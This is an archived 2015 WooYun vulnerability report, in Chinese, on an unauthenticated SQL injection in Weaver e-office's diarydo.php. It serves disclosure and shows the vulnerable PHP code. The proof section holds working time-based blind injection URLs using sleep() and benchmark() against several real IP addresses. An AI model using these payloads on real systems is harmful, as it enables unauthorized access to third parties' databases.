当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105517

漏洞标题:泛微e-office无需登录注入2

相关厂商:泛微e-office

漏洞作者: phith0n

提交时间:2015-04-07 10:12

修复时间:2015-07-09 17:26

公开时间:2015-07-09 17:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-07: 细节已通知厂商并且等待厂商处理中
2015-04-10: 厂商已经确认,细节仅向厂商公开
2015-04-13: 细节向第三方安全合作伙伴开放
2015-06-04: 细节向核心白帽子及相关领域专家公开
2015-06-14: 细节向普通白帽子公开
2015-06-24: 细节向实习白帽子公开
2015-07-09: 细节向公众公开

简要描述:

昨天交的2,跟我大哥pandas交的重复了。所以再来个2,应该没重复了。继续附带验证脚本。

详细说明:

解密源码后在/E-mobile/diarydo.php

include_once( "inc/utility_all.php" );
include_once( "inc/conn.php" );
include_once( "api/diary.class.php" );
include_once( "E-mobile/func_all.php" );
$diff = $_REQUEST['diff'];
switch ( $diff )
{
case "reply" :
$Diary = new diary( );
$replyinfor = array( );
$replyinfor['content'] = $_REQUEST['content'];
$replyinfor['diaryid'] = $_REQUEST['diary_id'];
$replyinfor['useid'] = $_REQUEST['user_id'];
$replyinfor['replytime'] = date( "Y-m-d H:i:s", time( ) );
$check = $Diary->New_Reply_Diary( $y );
echo "success";
break;


执行$Diary->New_Reply_Diary( $y );,跟进New_Reply_Diary函数:

public function New_Reply_Diary( $info )
{
global $connection;
$sql = "INSERT INTO diary_review \r\n\t (DIA_ID,USER_ID,DIA_RE_CONTENT,DIA_RE_DATE,DIA_RE_PARENT_ID) \r\n\t\t\t\t VALUES \r\n\t\t\t\t (".$info['diaryid'].",'".$info['useid']."','".$info['content']."',\r\n\t\t\t\t\t'".$info['replytime']."',0)\r\n\t\t\t ";
exequery( $connection, $sql );
}


$info['diaryid']直接插入insert函数,没有引号。
造成注入。
因为没有回显,所以我写了个盲注脚本,跑user()做示范。不过脚本里用了sleep()函数,可能有些mysql版本低的没有这个函数,修改成banchmark即可。

漏洞证明:

http://61.163.107.26:8082/E-mobile/diarydo.php?diff=reply&diary_id=sleep(if(ord(substr(user(),1,1))=114,5,0))
http://219.232.254.131:8082/E-mobile/diarydo.php?diff=reply&diary_id=if(ord(substr(user(),1,1))%3E0,benchmark(500000,md5(2)),0)
http://122.224.149.30:8082/E-mobile/diarydo.php?diff=reply&diary_id=sleep(if(ord(substr(user(),1,1))=114,5,0))
脚本截图:

QQ20150403-2@2x.png


延时注入:

QQ20150403-1@2x.png

修复方案:

过滤

版权声明:转载请注明来源 phith0n@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-04-10 17:25

厂商回复:

CNVD未能确认所述情况,将由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无